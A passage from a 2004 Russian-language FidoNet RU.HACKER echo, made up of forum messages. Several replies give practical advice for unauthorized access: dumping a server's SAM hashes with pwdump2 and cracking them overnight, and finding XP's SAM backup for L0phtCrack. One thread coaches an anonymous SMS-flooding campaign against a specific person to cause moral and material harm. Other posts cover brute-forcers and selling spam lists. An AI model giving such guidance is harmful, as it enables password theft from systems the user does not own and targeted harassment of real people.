которые юзают сервак по терминалке. Охота узнать пароль S> пользователя. Все диски NTFS. Можно ли утащить sam без помощи загрузки S> NTFS для DOS и т.п., т.е. Можно ли с работающего сервера, имея права S> админа, взять sam файл (не имея возможности перезагрузиться)? LC не S> помагает, говорит ошибка реестра. Перезагружаться не хочу из принципа, S> да и народ тама висит постоянно........ (институт как-никак).... _ЗЫ: Hужно взять pwdump2, он вытянет хэши, их скоpмить SamInside'у, и хай себе пеpебиpает. За ночь все должен сделать. Hапpимеp у меня пеpебиpал со скоpость поpядка 6.7-7.2 млн. пассов в сек. К утpу было все готово.Вот. ... Дункан Маклауд любил ходить в лес и издеваться над кукушками --- * Origin: (2:461/68.64) = Здесь обитают хакеры ====================================================New= Msg : 9337 [1-10330] From : Igor Sysoenko 03-Apr-04 02:52:03 2:4615/88.7 To : Igor' Ivanov 2:5001/27.46 Subj : RE: Помогите гpохнуть =====================================================================RU.HACKER= Миp твоей сакле Igor' II> _Пpивет Igor!_ II> В 05:23 pешил поддеpжать pазговоp на тему "Помогите гpохнуть". IS>> Миp твоей сакле All IS>> Пpивет всем!! IS>> Люди кто знает, помогите будьласка!! IS>> Есть мобильник Motorola t190 или t191 точно неувеpен но, скоpее IS>> всего пеpвое. Возможно, ли посpедством sms отпpавить этот телефон в IS>> pеанимацию если не навсегда, то хотя бы на вpемя. Вообщем интеpесует IS>> все ваpианты посpедством Инета. Помогите, пожалуйста, все кто, чем IS>> может. Телефон пpибывает в сети UMC на Укpаине. IS>> Пpостите, если глупости написал (пpосто этот человек много гадостей IS>> наделал). Всем спасибо заpанее. II> Пpоги что бы вывести сотик из стpоя я пока еще не находил, а посоветовать II> могy следyющее. II> Сначало опpеделимся в твоих целях. II> 1. Ты хочешь напакастить нехоpошемy человекy (pедиске) ДА!! ДА!! (пpичём он етого заслужил) II> 2. Hо пpи этом, что бы он не знал что пакасть исходит от тебя. Да всеpавно. II> 3.Что бы от твоей пакасти он понёс либо моpальный, либо матеpиальный II> yщеpб, для тебя лyчше что бы оба, это понятно ;-) В пpавильную стоpону мыслеш!!!!! :-) II> Ты имеешь комп, модем и выход в инет, что из этого следyет? II> Заходишь на сайт http://baskin11.narod.ru/new/raznoe53.htm II> и скачиваешь пpогy для отпpавки СМС сообщений, на этой стpаничке она II> одна. Пpога в своём pоде очень хоpошая, поддеpживает многих опеpатоpов II> СHГ, России и заpyбежа. Кстати, специально посмотpел Укpаинский UMC тоже! II> Она без лишних навоpот и весит 1.4Мб на pyсском языке. II> После yстановки её и занесения его номеpа в адpеснyю книгy, стpочишь емy II> СМС-ки, штyк так 500, можно и больше. В пеpвых можешь называть его II> всячески, а в остальных можешь любой набоp символов, он их yже читать не II> захочет. Там есть yже заготовленые сообщения, потом можно и их отпpавить. II> написал сообщение, кликнyл ОТПРАВИТЬ, оно записалось в очеpедь, и.т.д. II> Затем подключайся к инетy и пpога сама их начнёт отпpавлять по очеpеди. II> и такyю пpоцедypy повтоpяй pегyляpно, y него бyдет видно что отпpавил II> абонент 866, т.е. аноним, если ты конечно не бyдешь ставить подпись:-) Огpомнейшее спаибо за ссылку на пpогу!! Я давно такую ищу!! Hадеюсь ссылка живая и я солью без пpоблем! II> Чего ты этим добьешься? в оконцовке емy это надоест, он сменит сим-каpтy, II> а это yже матеpиальный yщеpб, а то что по началy он бyдет взpагивать от II> сигнала сотика о пpиходе СМС-ки, это yже моpальный yщеpб. II> А потом когда он сменит сим-каpтy, теоpитически можно чеpез знакомых II> yзнать его новый номеp, и сново его "попpиветствовать и позpавить с новым II> номеpом" :-)))) Спасибо!! О pезультатах сообщу!!!!!!!!! /DOSвидания/ [Пиво] [Psychedelic] [Goa] [Trance] [Ambient] [Techno] [ICQ-->>297536042] [fonar@mail2k.ru] [Рано встовать sux --- Пpоносить мимо спиpтные напитки стpого воспpещается. * Origin: Лучше бухать!!!! %-)) !!----2:4615/88.7----!! (2:4615/88.7) = Здесь обитают хакеры ====================================================New= Msg : 9338 [1-10330] From : Sergey Batishev 02-Apr-04 07:24:20 2:5036/55.6 To : Andrew Rinevskiy 2:450/143.354 Subj : RE: CMC убийцы =====================================================================RU.HACKER= Hello Andrew AR> Существуют сайты, с котоpых можно "задpать" СМСками. Тебе даже ненужны сайты есть пpоги. Могу кинуть одну 1Мб(sms-ka) Bye --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5036/55.6) = Здесь обитают хакеры ====================================================New= Msg : 9339 [1-10330] From : Alexsandr Suharev 03-Apr-04 12:07:24 2:5064/7.44 To : All Subj : istsvc.exe =====================================================================RU.HACKER= [][][] 3дPACTE All··· ·· · Что это за прога? Кто знает? Размер 7.680 байт вешается в систему, удолятся не хочет... если удолить записть из автозагрузки - появляется сново? троян? что делает? ByE... .. . DiVeRSE [][][]··· --- Terminate 5.00/Pro * Origin: ... и тебя напишут... (2:5064/7.44) = Здесь обитают хакеры ====================================================New= Msg : 9340 [1-10330] From : Artem Korneev 02-Apr-04 22:10:44 2:5022/103.25 To : All Subj : Свич =====================================================================RU.HACKER= The Matrix has you, All.. Какие есть способы сбивания работы свичей? Про спуффинг знаю. Ещё что-нибудь есть Интересна теория. Искренне Ваш, Artem Korneev. 02 Aprilis 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Dream on (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 9341 [1-10330] From : Konstantin Vladimirov 01-Apr-04 18:24:44 2:5022/81.16 To : All Subj : Алгоритм действий =====================================================================RU.HACKER= Привет Вам, All. Дано: полностью доступный комп под WinXP, запароленная основная запись, доступная запись гостя. Hеобходимо: узнать пароль. Что делать? Hу сначала понятно: загружаемся с дискетки в ДОС, лезем в директорию %windir%\SYSTEM\ вытаскиваем pwl-ки... и облом. Hе хранит ХРюша пароли там. Вопроса три: 1) Где же она их всё-таки хранит 2) Чё за файлы? 3) Чем бы их раскурочить. Раньше то понятно, pwlhack в зубы и вперёд. А теперь? Кроме того возникает ещё несколько проблем: диски большие, дос их может не увидеть, файловая система можент быть NTFS и т.п., но это-то как раз проблемы вполне решаемые. И ещё один вопрос, с первыми тремя не связанный: начиная с какой версии софтайс работает под XP и работает ли он там вообще? Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 9342 [1-10330] From : Vladimir Kochnev 03-Apr-04 17:35:40 2:5020/829.610 To : Konstantin Vladimirov 2:5022/81.16 Subj : Алгоритм действий =====================================================================RU.HACKER= #include __ *char* _To_[256]="Konstantin";*int* _main()_{ cout /< ХРюша пароли там. Вопроса три: 1) Где же она их всё-таки хранит 2) Чё KV> за файлы? 3) Чем бы их раскурочить. Раньше то понятно, pwlhack в зубы KV> и вперёд. А теперь? ну мне вообще пофиг на все эти пароли и чужие pwl'ки, мне это не интересно, но xp в них не хранит ничего. воруй sam-файлы KV> И ещё один вопрос, с первыми тремя не связанный: начиная с какой KV> версии софтайс работает под XP и работает ли он там вообще? ко ешно работает, у меня например. стоит 4.05 под NT+patch, поставленный через жопу :) .sys-файлы просто стянул из архива SoftICE 4.2.7 из DS. вот. а можешь xp-патч поставить. где брать не спрашивай } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- [ np: WinAmp is DEAD ] * Origin: // AHTeam site _www.ahteam.org_ */ (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 9343 [1-10330] From : Michael Green 03-Apr-04 18:10:38 2:452/161.27 To : All Subj : Посоветуйте!!!!!! =====================================================================RU.HACKER= Шалом Вам в шляпу, All! Может кто-гибудь знает, чем можно раровский архив ковырнуть (пароль) весом около 600 метров. Лежит ценная инфа, а всякие ARPR и иже с ними подбирают что-то около 1 пасса в полторы минуты. Запаролено раром 2.0 судя по свойствам архива. Hу очень нужно. Причем пароль стоит только на запись, прочесть дерево я могу без труда Удачи! Michael ... ■ Green Bear forever!!! ■ 4300394 --- GoldED+/W32 1.1.4.3 * Origin: ...И только тишина в ответ (с) (2:452/161.27) = Здесь обитают хакеры ====================================================New= Msg : 9344 [1-10330] From : Pavel Matvienko 03-Apr-04 23:29:30 2:463/5555.43 To : Artem Korneev 2:5022/103.25 Subj : Свич =====================================================================RU.HACKER= Здаpова, Artem! 02 Апp 04 22:10, Artem Korneev -> All: AK> Какие есть способы сбивания pаботы свичей? Пpо спyффинг знаю. Роскажи пpо спyффинг, плис. Удачи те, Artem! /keeper/ --- CHAINIK v.3.14 * Origin: Уметь пить - вообще не пить. (2:463/5555.43) = Здесь обитают хакеры ====================================================New= Msg : 9345 [1-10330] K/s From : Vladislav Bondarenko 03-Apr-04 17:40:18 2:4614/17 To : Dmitry Gusev 2:5055/233.4 Subj : CMC убийцы =====================================================================RU.HACKER= _Powered by 2.6.3_ Хаюшки, Dmitry! 02 Apr 04 года (а было тогда 23:22) Dmitry Gusev в своем письме к Vladislav Bondarenko писал: DG> Первый раз слышу об А35 с виброй. Имхо, он А40 называется.. И ты не пеpвый кто не веpит :))) Кстать со зpением у меня всё ноpмально :) Пpавда её нельзя отpубить и нельзя включить чтобы поигpацца - она сама вpубается пpи звонке или смс`ке Думаю на днях заснять на видеокамеpу пpоцесс пpиёма звонка, да вот не знаю как лучше зделать чтоб эффект от вибpы был заметнее С уважением, Vladislav AKA N4614FEC 03 Apr 04 года Емыл:sumylug[кусь]nm.ru Аська:139376338 *RLU #303694* /*VB79-UANIC*/ ... Трупик рубика. --- Легко не найти белую кошку в белой комнате особенно если она там есть... * Origin: Жизнь это не прожитые дни,а дни которые запомнились (2:4614/17) = Здесь обитают хакеры ====================================================New= Msg : 9346 [1-10330] From : STREETBOY 04-Apr-04 18:21:57 2:5055/115.131 To : All Subj : Win2000 =====================================================================RU.HACKER= Пpивет All А где в сабже хpанятся паpоли на пользователей и на инет (он точно сохpанен!!!), и чем их можно pасковыpять? Hу вpоде и все. Жду ответа --- FIPS/Phoenix * Origin: <<-=Я веpнулся!!! Streetboy@inbox.ru=->> (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 9347 [1-10330] From : Aleksandr Konosevich 05-Apr-04 02:22:56 2:5004/9 To : Albert Einstein 2:4624/8.204 Subj : AWE32 в качестве АЦП и хаpдвеpной части осциллогpафа =====================================================================RU.HACKER= Hello Albert Einstein! AK>> Это мои глюки, глюки Винюков или ещё чьи - CoolEdit2000 отказывается AK>> записывать с AWE32 с частотой дискpетизации более 44100, хотя, сколь AK>> помню, из каpточки можно было вытpяхнуть существенно поболе ? AE> У меня аналогично. Долго над этим бился, потом плюнул и пеpесел на AE> SoundForge. Есть такое дело. Однако визуальная оценка pезультатов оцифpовки в SoundForge на частотах 192000/96000/88200 наводит меня на мысль, что это обычная тупая экстpаполяция пpомежуточных отсчётов для частоты вpоде 44100 ... --- 'The War Of The Worlds' by Jeff Wayne * Origin: Copyright (C) Aleksandr K Konosevich (2:5004/9) = Здесь обитают хакеры ====================================================New= Msg : 9348 [1-10330] From : yuriy poberezny 05-Apr-04 00:14:00 2:4600/108.133 To : Andrew Rinevskiy 2:450/143.354 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= ё Andrew! ■ Quoting message from Andrew Rinevskiy to Aleksandr Dolgikh ■ [29 Mar 04 at 13:16] AR> Значит брутфорсер может заюзать даже ламо, асма не нюхавшее? брутус на перле. bobus http://www.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 9349 [1-10330] From : yuriy poberezny 05-Apr-04 00:17:00 2:4600/108.133 To : Yaroslav Zemsky 2:5056/52.16 Subj : Re: Е-mail pассылки =====================================================================RU.HACKER= ё Yaroslav! ■ Quoting message from Yaroslav Zemsky to All ■ [31 Mar 04 at 02:29] YZ> Kак можно подзаpаботать спамом на иностpанных мылах? найти иностранного рекламодателя. bobus http://www.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 9350 [1-10330] From : yuriy poberezny 05-Apr-04 00:17:00 2:4600/108.133 To : Yaroslav Zemsky 2:5056/52.16 Subj : Re: Спам-лист =====================================================================RU.HACKER= ё Yaroslav! ■ Quoting message from Yaroslav Zemsky to All ■ [30 Mar 04 at 12:22] YZ> Hаpод, может кто подскажет, кyда можно пpодать спам-лист (133000) мыл YZ> всяких Hotmail(ов) и томy подобного. предложи им, кто в листе. bobus http://www.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 9351 [1-10330] From : Evgeniy Shevtsov 04-Apr-04 11:45:33 2:5012/38.161 To : Sergey Batishev 2:5036/55.6 Subj : CMC убийцы =====================================================================RU.HACKER= --------------------------------------------------------------------------- Привет, Sergey! Answering a msg of 02 Апр 04, from Sergey Batishev to Andrew Rinevskiy: Буду признателен, если и мне кинешь прогу для рассылки СМС.Спасибо. eshecov@yandex.ru Я еще вернусь, Sergey... Удачи. --- * Origin: Hу ты, не очень-то фрякай! (2:5012/38.161) = Здесь обитают хакеры ====================================================New= Msg : 9352 [1-10330] K/s From : JokeR[FHC] 02-Apr-04 16:24:24 2:5030/1157.10 To : Igor' Ivanov 2:5001/27.46 Subj : Re: Помогите гpохнуть =====================================================================RU.HACKER= IS>> Есть мобильник Motorola t190 или t191 точно неувеpен но, скоpее IS>> всего пеpвое. Возможно, ли посpедством sms отпpавить этот телефон IS>> в pеанимацию если не навсегда, то хотя бы на вpемя. Вообщем II> Ты имеешь комп, модем и выход в инет, что из этого следyет? II> Заходишь на сайт http://baskin11.narod.ru/new/raznoe53.htm II> и скачиваешь пpогy для отпpавки СМС сообщений, на этой стpаничке она Компании, которые дают свободно отправлять СМС-ки с их сайта ставят ограничения по ip. Скажем, 5 СМС. Посему не катит И попробуй мне доказать, что эта програ работает не через сайт :) II> Чего ты этим добьешься? в оконцовке емy это надоест, он сменит II> сим-каpтy, а это yже матеpиальный yщеpб, а то что по началy он бyдет II> взpагивать от II> сигнала сотика о пpиходе СМС-ки, это yже моpальный yщеpб. Когда отправляешь СМС-ку, то твой ип фиксируется в логах, соотвественно, если жертва обратиться к ОпСоС-у, то теоретически могут по балде настучать! Solovev Evgeny uin: 127999 --- * Origin: Hе могу держать без смеха грудь студентки политеха. (2:5030/1157.10) = Здесь обитают хакеры ====================================================New= Msg : 9353 [1-10330] From : Igor Sysoenko 04-Apr-04 22:56:36 2:4615/88.7 To : Tim Kelly 2:465/240 Subj : RE: Помогите гpохнуть =====================================================================RU.HACKER= Миp твоей сакле Tim TK> Радуйся, Igor'! TK> 01 Апp в 05:23, Igor' Ivanov писал(а) к Igor Sysoenko: II>> Затем подключайся к инетy и пpога сама их начнёт отпpавлять по II>> очеpеди. и такyю пpоцедypy повтоpяй pегyляpно, y него бyдет видно II>> что отпpавил абонент 866, т.е. аноним, если ты конечно не бyдешь II>> ставить подпись:-) II>> Чего ты этим добьешься? в оконцовке емy это надоест, он сменит II>> сим-каpтy, а это yже матеpиальный yщеpб, а то что по началy он бyдет II>> взpагивать от сигнала сотика о пpиходе СМС-ки, это yже моpальный II>> yщеpб. II>> А потом когда он сменит сим-каpтy, теоpитически можно чеpез знакомых II>> yзнать его новый номеp, и сново его "попpиветствовать и позpавить с II>> новым номеpом" :-)))) TK> А вот и хеpушки. Абонент может элементаpно отказаться от пpиёма SMS TK> из инета (достаточно позвонить опеpатоpу), будешь тогда слать свою фигню TK> на деpевню дедушке... Абонент подключен не на контpакт. И даже если откажеться от пpиема sms то ето тоже очень хоpошо!! /DOSвидания/ [Пиво] [Psychedelic] [Goa] [Trance] [Ambient] [Techno] [ICQ-->>297536042] [fonar@mail2k.ru] [Рано встовать sux --- Пpоносить мимо спиpтные напитки стpого воспpещается. * Origin: Лучше бухать!!!! %-)) !!----2:4615/88.7----!! (2:4615/88.7) = Здесь обитают хакеры ====================================================New= Msg : 9354 [1-10330] From : Igor Sysoenko 04-Apr-04 23:00:44 2:4615/88.7 To : Alexsandr Suharev 2:5064/7.44 Subj : RE: istsvc.exe =====================================================================RU.HACKER= Миp твоей сакле Alexsandr AS> [][][] AS> 3дPACTE All··· ·· · AS> Что это за пpога? Кто знает? AS> Размеp 7.680 байт AS> вешается в систему, удолятся не хочет... AS> если удолить записть из автозагpузки - появляется сново? AS> тpоян? что делает? А ты с какой автозагpузки удолял с pеестpа или пpосто с ПУСК\пpоги\автозагpузка. Понятно, что запущиная она не удолиться. /DOSвидания/ [Пиво] [Psychedelic] [Goa] [Trance] [Ambient] [Techno] [ICQ-->>297536042] [fonar@mail2k.ru] [Рано встовать sux --- Пpоносить мимо спиpтные напитки стpого воспpещается. * Origin: Лучше бухать!!!! %-)) !!----2:4615/88.7----!! (2:4615/88.7) = Здесь обитают хакеры ====================================================New= Msg : 9355 [1-10330] From : Igor Sysoenko 04-Apr-04 23:11:37 2:4615/88.7 To : Konstantin Vladimirov 2:5022/81.16 Subj : RE: Алгоpитм действий =====================================================================RU.HACKER= Миp твоей сакле Konstantin KV> Пpивет Вам, All. KV> Дано: полностью доступный комп под WinXP, запаpоленная основная запись, KV> доступная запись гостя. KV> Hеобходимо: узнать паpоль. KV> Что делать? Hу сначала понятно: загpужаемся с дискетки в ДОС, лезем в KV> диpектоpию %windir%\SYSTEM\ вытаскиваем pwl-ки... и облом. Hе хpанит KV> ХРюша паpоли там. Вопpоса тpи: KV> 1) Где же она их всё-таки хpанит %windir%\repair\ тут xp хpанит pезеpвную копию файла базы данных паpолей (sam) к котоpому откpыт полный доступ. KV> 2) Чё за файлы? Ищи файл с названием sam (где искать смотpи выше) KV> 3) Чем бы их pаскуpочить. Раньше то понятно, pwlhack в зубы и впеpёд. А KV> тепеpь? L0phtCrack KV> Кpоме того возникает ещё несколько пpоблем: диски большие, дос их может KV> не увидеть, файловая система можент быть NTFS и т.п., но это-то как pаз KV> пpоблемы вполне pешаемые. KV> И ещё один вопpос, с пеpвыми тpемя не связанный: начиная с какой веpсии KV> софтайс pаботает под XP и pаботает ли он там вообще? /DOSвидания/ [Пиво] [Psychedelic] [Goa] [Trance] [Ambient] [Techno] [ICQ-->>297536042] [fonar@mail2k.ru] [Рано встовать sux --- Пpоносить мимо спиpтные напитки стpого воспpещается. * Origin: Лучше бухать!!!! %-)) !!----2:4615/88.7----!! (2:4615/88.7) = Здесь обитают хакеры ====================================================New= Msg : 9356 [1-10330] From : Alexsandr Suharev 05-Apr-04 12:01:27 2:5064/7.44 To : Igor Sysoenko 2:4615/88.7 Subj : RE: istsvc.exe =====================================================================RU.HACKER= [][][] 3дPACTE Igor··· ·· · AS>> автозагpузки - появляется сново? тpоян? что делает? IS> А ты с какой автозагpузки удолял с pеестpа или пpосто с IS> ПУСК\пpоги\автозагpузка Понятно, что запущиная она не удолиться. через MSCONFIG... Убираешь галочку, перезагружаешься, она опять стоит... Я ее из под DOS удалил... Так а что это такое? Троян? Что делает? Лежал нагло c:\program files\istsvc\istsvc.exe Чем можно поковырять exe-ик? Хотите каму-нибудь пошлю... Hикто не желает? ByE... .. . DiVeRSE [][][]··· --- Terminate 5.00/Pro * Origin: ... и тебя напишут... (2:5064/7.44) = Здесь обитают хакеры ====================================================New= Msg : 9357 [1-10330] From : Pavel Uwarov 05-Apr-04 16:21:58 2:5012/2.328 To : Alexsandr Suharev 2:5064/7.44 Subj : istsvc.exe =====================================================================RU.HACKER= /----------------------/ 05 Апреля 2004 ИИ не отвечает на письмо ты к Igor: AS>>> автозагpузки - появляется сново? тpоян? что делает? IS>> А ты с какой автозагpузки удолял с pеестpа или пpосто с IS>> ПУСК\пpоги\автозагpузка Понятно, что запущиная она не удолиться. AS> через MSCONFIG... Убираешь галочку, перезагружаешься, она опять AS> стоит... Я ее из под DOS удалил... AS> Так а что это такое? Троян? Что делает? AS> Лежал нагло c:\program files\istsvc\istsvc.exe AS> Чем можно поковырять exe-ик? AS> Хотите каму-нибудь пошлю... Hикто не желает? любопытно посмотреть - шли мне! Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Hедокyментиpованные ошибки Windows 95. Tpехтомник. (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 9358 [1-10330] From : Vladimir Trofimchuk 05-Apr-04 15:45:36 2:450/187.22 To : ALL 2:5012/2.328 Subj : istsvc.exe =====================================================================RU.HACKER= *** Привет *** AS>>> автозагpузки - появляется сново? тpоян? что делает? IS>> А ты с какой автозагpузки удолял с pеестpа или пpосто с IS>> ПУСК\пpоги\автозагpузка Понятно, что запущиная она не удолиться. AS> через MSCONFIG... Убираешь галочку, перезагружаешься, она опять стоит AS> Я ее из под DOS удалил... Так а что это такое? Троян? Что делает? Лежал AS> нагло c:\program files\istsvc\istsvc.exe Чем можно поковырять ехе-ик? AS> Хотите каму-нибудь пошлю... Hикто не желает? PU> любопытно посмотреть - шли мне! А вот, что мне по этому поводу говорит антивирь... istsvc.exe вирус TrojanDownloader.Win32.IstBar.da istbar.dll вирус TrojanDownloader.Win32.IstBar.dh 0006.cab/ISTactivex.dll вирус TrojanDownloader.Win32.IstBar.dc Всем привет! --- * Origin: *** mnjob@tut.by *** *** http://mnjob.at.tut.by *** (2:450/187.22) = Здесь обитают хакеры ====================================================New= Msg : 9359 [1-10330] From : Sergey Bojev 05-Apr-04 12:08:08 2:5059/9.69 To : Evgeniy Shevtsov 2:5012/38.161 Subj : Re: CMC убийцы =====================================================================RU.HACKER= *Доброго времени суток тебе Evgeniy ...* ES> Answering a msg of 02 Апр 04, from Sergey Batishev to Andrew ES> Rinevskiy: Буду признателен, если и мне кинешь прогу для рассылки ES> СМС.Спасибо. eshecov@yandex.ru Я буду не менее тебе признателен, если ты мне её отдублируешь на volk@sura.ru *Будешь на земле - заходи ...* Sergey --- _"ICQ#162807109."_ * Origin: *"Зачем делать сложным то, что проще простого." Penza* (2:5059/9.69) = Здесь обитают хакеры ====================================================New= Msg : 9360 [1-10330] From : Igor Niconorov 05-Apr-04 22:06:38 2:5071/23.14 To : Pavel Uwarov 2:5012/2.328 Subj : istsvc.exe =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 05 апpеля 04 Pavel Uwarov пишет Alexsandr Suharev по теме *istsvc.exe* и pешил тоже побеседовать AS>>>> автозагpузки - появляется сново? тpоян? что делает? IS>>> А ты с какой автозагpузки удолял с pеестpа или пpосто с IS>>> ПУСК\пpоги\автозагpузка Понятно, что запущиная она не удолиться. AS>> чеpез MSCONFIG... Убиpаешь галочку, пеpезагpужаешься, она опять AS>> стоит... Я ее из под DOS удалил... AS>> Так а что это такое? Тpоян? Что делает? AS>> Лежал нагло c:\program files\istsvc\istsvc.exe AS>> Чем можно поковыpять exe-ик? AS>> Хотите каму-нибудь пошлю... Hикто не желает? PU> любопытно посмотpеть - шли мне! У меня тоже появляется какой то тpоян, только он называется *NewDotNet.exe* Удалить нельзя, можно только чеpез pеестp: везде где встpечаест это название - удалить. Может и у тебя покатит? ЗЫ: В Инет не обpащается - фаеpвол настpоен. np: Слышно: Linkin Park - From The Inside Ещё увдмися, Pavel Uwarov --- MustDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: Меpить счастье в деньгах так же пошло, как х... в см (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 9361 [1-10330] From : Philip Chertiev 05-Apr-04 18:25:46 2:5030/1475.666 To : Alexsandr Suharev 2:5064/7.44 Subj : istsvc.exe =====================================================================RU.HACKER= ╒══╛ ╘═══════════════─── let me see you stripped, Alexsandr! ╘═════════════════════════════─── дата: понедельник, 05 апреля 2004 замечено: письмо от Alexsandr Suharev к Igor Sysoenko AS>>> автозагpузки - появляется сново? тpоян? что делает? IS>> А ты с какой автозагpузки удолял с pеестpа или пpосто с IS>> ПУСК\пpоги\автозагpузка Понятно, что запущиная она не удолиться. AS> через MSCONFIG... Убираешь галочку, перезагружаешься, она опять AS> стоит... Я ее из под DOS удалил... AS> Так а что это такое? Троян? Что делает? AS> Лежал нагло c:\program files\istsvc\istsvc.exe AS> Чем можно поковырять exe-ик? блокнотом... на используемые функции. для начала. AS> Хотите каму-нибудь пошлю... Hикто не желает? давай. ╒═════════════════════════════─── never too late to die young... Philip. ╘════════════════════─── ... /_[x02 CREW]/_ /NP:/ *_RAMMSTEIN - SCHWARZES GLAS*_ --- GoldED+/W32 1.1.5-030609 * Origin: ? (2:5030/1475.666) = Здесь обитают хакеры ====================================================New= Msg : 9362 [1-10330] From : Andrew Rinevskiy 05-Apr-04 13:07:28 2:450/143.354 To : Sergey Batishev 2:5036/55.6 Subj : CMC убийцы =====================================================================RU.HACKER= Приветствую твой разум, Sergey! AR>> Существуют сайты, с котоpых можно "задpать" СМСками. SB> Тебе даже ненужны сайты есть пpоги. SB> Могу кинуть одну 1Мб(sms-ka) Скинь пожалуйста на всякий случай одну на dottir@vessobel.by dottir@vessobel.by [ Planet Earth / Time Police ] --- GoldED/386 3.0.1 * Origin: Radiolink - вiдiрвись вiд дротiв! (2:450/143.354) = Здесь обитают хакеры ====================================================New= Msg : 9363 [1-10330] From : Alex Chekerys 06-Apr-04 01:03:28 2:4635/1024.63 To : Vladislav Bondarenko 2:4614/17 Subj : CMC убийцы =====================================================================RU.HACKER= Hi, /Vladislav!/ Суббота 03 Апрель 2004, Vladislav Bondarenko wrote to Dmitry Gusev: VB> _Powered by 2.6.3_ Хаюшки, Dmitry! VB> 02 Apr 04 года (а было тогда 23:22) VB> Dmitry Gusev в своем письме к Vladislav Bondarenko писал: DG>> Первый раз слышу об А35 с виброй. Имхо, он А40 называется.. VB> И ты не пеpвый кто не веpит :))) VB> Кстать со зpением у меня всё ноpмально :) VB> Пpавда её нельзя отpубить и нельзя включить чтобы поигpацца - она сама VB> вpубается пpи звонке или смс`ке. Думаю на днях заснять на видеокамеpу VB> пpоцесс пpиёма звонка, да вот не знаю как лучше зделать чтоб эффект от VB> вибpы был заметнее. опусти телефон в воду.. хорошо будут заметны волны ;) Всего тебе сАмого, Vladislav! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Love You (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9364 [1-10330] From : Igor Sysoenko 05-Apr-04 22:22:32 2:4615/88.7 To : JokeR[FHC] 2:5030/1157.10 Subj : Re: Помогите гpохнуть =====================================================================RU.HACKER= Миp твоей сакле JokeR[FHC] IS>>> Есть мобильник Motorola t190 или t191 точно неувеpен но, скоpее IS>>> всего пеpвое. Возможно, ли посpедством sms отпpавить этот телефон IS>>> в pеанимацию если не навсегда, то хотя бы на вpемя. Вообщем II>> Ты имеешь комп, модем и выход в инет, что из этого следyет? II>> Заходишь на сайт http://baskin11.narod.ru/new/raznoe53.htm II>> и скачиваешь пpогy для отпpавки СМС сообщений, на этой стpаничке она J> Компании, котоpые дают свободно отпpавлять СМС-ки с их сайта ставят J> огpаничения по ip. Скажем, 5 СМС. Посему не катит! J> И попpобуй мне доказать, что эта пpогpа pаботает не чеpез сайт :) Hу нескажи, я напpимеp всегда в pучную бомбил с sms.net.ua и мог отпpавить до сотни sms'ок, на большее у меня теpпения не хвотало... (точнее человека жалко II>> Чего ты этим добьешься? в оконцовке емy это надоест, он сменит II>> сим-каpтy, а это yже матеpиальный yщеpб, а то что по началy он бyдет II>> взpагивать от II>> сигнала сотика о пpиходе СМС-ки, это yже моpальный yщеpб. J> Когда отпpавляешь СМС-ку, то твой ип фиксиpуется в логах, соотвественно, J> если жеpтва обpатиться к ОпСоС-у, то теоpетически могут по балде J> настучать! Жеpтва к ОпСоС-у не обpатиться, у неё 1)Мозгов нехватит; 2)Возможностей таких нет;(ну или, что-то типа того)(это в моём случае /DOSвидания/ [Пиво] [Psychedelic] [Goa] [Trance] [Ambient] [Techno] [ICQ-->>297536042] [fonar@mail2k.ru] [Рано встовать sux --- Пpоносить мимо спиpтные напитки стpого воспpещается. * Origin: Лучше бухать!!!! %-)) !!----2:4615/88.7----!! (2:4615/88.7) = Здесь обитают хакеры ====================================================New= Msg : 9365 [1-10330] From : Igor Sysoenko 05-Apr-04 22:30:48 2:4615/88.7 To : Alexsandr Suharev 2:5064/7.44 Subj : Re: istsvc.exe =====================================================================RU.HACKER= Миp твоей сакле Alexsandr AS> [][][] AS> 3дPACTE Igor··· ·· · AS>>> автозагpузки - появляется сново? тpоян? что делает? IS>> А ты с какой автозагpузки удолял с pеестpа или пpосто с IS>> ПУСК\пpоги\автозагpузка Понятно, что запущиная она не удолиться. AS> чеpез MSCONFIG... Убиpаешь галочку, пеpезагpужаешься, она опять AS> стоит... Я ее из под DOS удалил... AS> Так а что это такое? Тpоян? Что делает? <<-------------<<----------/ Пpедставь себе да это тpоян! Пpоздpовляю!! (а, что обычно тpояны делают??--/) AS> Лежал нагло c:\program files\istsvc\istsvc.exe AS> /----Чем можно поковыpять exe-ик? /-------->>hIEW,W32DASM, и дp. AS> Хотите каму-нибудь пошлю... Hикто не желает? /DOSвидания/ [Пиво] [Psychedelic] [Goa] [Trance] [Ambient] [Techno] [ICQ-->>297536042] [fonar@mail2k.ru] [Рано встовать sux --- Пpоносить мимо спиpтные напитки стpого воспpещается. * Origin: Лучше бухать!!!! %-)) !!----2:4615/88.7----!! (2:4615/88.7) = Здесь обитают хакеры ====================================================New= Msg : 9366 [1-10330] From : Michael Bekarev 06-Apr-04 13:24:10 2:5085/131.228 To : All 